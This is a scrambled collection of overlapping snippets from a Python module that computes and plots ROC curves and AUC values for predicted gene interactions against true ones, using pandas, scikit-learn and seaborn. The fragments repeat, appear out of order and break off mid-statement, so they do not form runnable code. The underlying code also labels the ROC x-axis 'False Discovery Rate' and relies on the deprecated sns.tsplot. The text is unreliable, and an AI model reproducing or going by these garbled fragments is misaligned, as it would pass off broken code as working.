= _get_evaluation_on_given_labels( labels, true_interactions.intensity,", "# print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0:", "pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy,", "from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\")", "labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in", "= true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, 
np.zeros((zero_interactions)))", "index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions", "include AUC to show it in legend if auc_dict_list: for method in auc_dict_list.keys():", "print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx,", "np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = (", "to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='',", "plot a ROC curve.\"\"\" labels = { gene for genes in [ true_interactions.e1,", "xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve", "seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n *", "= reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points *", "\"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\" labels =", "title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True )", "data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel)", "curve.\"\"\" labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2", "true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if", "roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 
'method': ( number_of_roc_points * [method_name] ),", "mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method']", "ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot as plt", "matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve, auc #", "yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve =", "reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name],", "it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices", "index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions", "true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values,", "Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' #", "np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ):", "predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores = _get_evaluation_on_given_labels(", "sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1)", "* [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df(", "plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel =", "in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = 
df['method'] == method df['mean_auc'] = mean_auc", "avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway',", "_check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2", "scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can", "sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold,", "def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index, labels_set,", "df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method", "interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set)", "e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([", "seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\")", "sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index,", "), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None,", "0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points", "import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve, auc", "true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels)", "yy) else: yy = reference_xx area_under_curve = 0.5 # worst 
roc_df = pd.DataFrame({", "unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath: plt.savefig(output_filepath,", "'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df,", "!= 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method')", "interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions,", "sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n -", "6) ): \"\"\"From a df with multiple methods plot a roc curve using", "predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100", "import pandas as pd import numpy as np import matplotlib.pyplot as plt import", "curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate'", "= set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ])", "interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node", "): \"\"\"From a df with multiple methods plot a roc curve using sns.tspot.\"\"\"", "''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df,", "yy = reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points", "sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel)", 
"_filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for", "= _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) )", "sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title =", "a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions,", ") ) if no_self_loops: interaction_indices = [ index for index in interaction_indices if", "] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions =", "'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic'", "in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name,", "print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx,", "in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y,", "+ 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to", "}) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From", "= np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def", "* [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() })", "be 
used to plot a ROC curve.\"\"\" labels = { gene for genes", "pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index,", "df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot(", "auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return", "in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices =", "# rename method name to include AUC to show it in legend if", "== method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if", "df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method !=", "to plot a ROC curve.\"\"\" labels = { gene for genes in [", "_get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set(", "if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices", "Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename", "dataframe that can be used to plot a ROC curve.\"\"\" labels = {", "= df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format(", "'.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc", "number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\"", "def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = 
index.split(interaction_symbol) return (e1 in labels_set and", "genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes }", "for gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity )", "= list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices", "= np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y,", "zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values,", "used to plot a ROC curve.\"\"\" labels = { gene for genes in", "as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import", "another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True", "= mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT'", "xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver", "condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath:", "'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method )", "interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in", "[ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores", "another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): 
total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices =", "multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate'", "interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops:", "color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) /", "predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y)", ").fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append(", "else: yy = reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway':", "ROC curve.\"\"\" labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2,", "inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX',", "df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False", "to build ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot", "true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a", "plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods", "predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices)", "df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize()", "= df.sort_values(by='method') 
df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid':", "yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5", "len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y,", "method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot", "to include AUC to show it in legend if auc_dict_list: for method in", "= 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': (", "_filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for index in", "= [ index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions =", ") if no_self_loops: interaction_indices = [ index for index in interaction_indices if not", "= 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method name", "method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method", "settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n", "labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set,", "roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy", "sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def", "= ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method ) +", "= pd.Series([ 
_check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def", "else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''},", "{'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0,", "number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def", "true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores", "'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method':", "y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx,", "e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes,", "def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels(", "return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set", "sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette)", "indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def", "not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0)", "a ROC curve.\"\"\" labels = { gene for genes in [ 
true_interactions.e1, predicted_interactions.e1,", "= index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels,", "labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ]", "False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1])", "]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node ==", "get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used", "scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy =", "method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] =", "np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst roc_df", "using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title", "scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name,", ") return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return", "== another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices", "1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1", "pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn", "labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ 
_check_index(index, labels_set, interaction_symbol) for index", "auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve =", "'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX':", "labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index,", "yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6,", "as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette", "labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for", "import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\")", "labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node,", "return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions =", "auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices,", "scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx =", "predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions)", "def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): 
\"\"\"From a df with multiple", "sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette =", "scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy)", "* (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 =", "indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node", "= { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for", "{ gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene", "legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath: plt.savefig(output_filepath, bbox_inches='tight')", "yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy =", "build ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot as", "area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx", "title = 'Receiver Operating Characteristic' # rename method name to include AUC to", "% mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend", "for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node =", "as plt import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn", "np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df(", "(n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol)", "[ index for index in interaction_indices 
if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex(", ") df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize)", "time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title)", "'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6)", "for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0)", "y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx", "index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices", "df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods plot", "'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None,", "= np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions,", "} y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores)", "if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores,", "worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name]", "2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set", "interaction_indices ).fillna(0.0) 
zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores =", "legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True", "# to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY',", "numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics", "that can be used to plot a ROC curve.\"\"\" labels = { gene", "xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst roc_df =", "Positive Rate' title = 'Receiver Operating Characteristic' # rename method name to include", "auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method", "labels) ) ) if no_self_loops: interaction_indices = [ index for index in interaction_indices", "\"\"\"Methods used to build ROC.\"\"\" import pandas as pd import numpy as np", "_get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1,", "_is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions", "methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel", "Rate' title = 'Receiver Operating Characteristic' # rename method name to include AUC", "np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name,", "gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) #", 
"_get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if", "interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions", "def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol)", "genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y,", "total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) )", "figsize=(6, 6) ): \"\"\"From a df with multiple methods plot a roc curve", "y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores", "= np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst", "used to build ROC.\"\"\" import pandas as pd import numpy as np import", "'{} '.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' %", "(e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set =", "plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0,", "= auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve", "_get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'):", "output_filepath=None, figsize=(6, 6) ): 
\"\"\"From a df with multiple methods plot a roc", "df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False})", "pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns", "= 'Receiver Operating Characteristic' # rename method name to include AUC to show", "np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions,", "# worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points *", "no_self_loops: interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index) ]", "for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes", "mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else", "interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex(", "reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ):", "np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve,", "> 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx,", "scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold", "return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a", "_is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = 